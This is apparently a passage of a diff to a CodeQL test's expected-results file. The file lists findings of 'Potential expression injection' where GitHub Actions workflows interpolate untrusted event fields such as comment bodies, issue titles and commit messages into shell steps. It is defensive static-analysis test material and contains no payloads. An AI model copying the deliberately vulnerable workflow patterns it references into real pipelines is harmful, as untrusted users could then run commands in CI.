'$ ... nch }}' | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... 
ion }}' | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... 
title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... 
tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... 
utput}} | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. 
| -| .github/workflows/matrix.yml:41:12:42:31 | \| | .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:41:12:42:31 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... 
age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... 
nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... 
ody }}' | .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... 
age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | .github/workflows/push.yml:11:12:11:62 | echo '$ ... 
ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. 
| -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. 
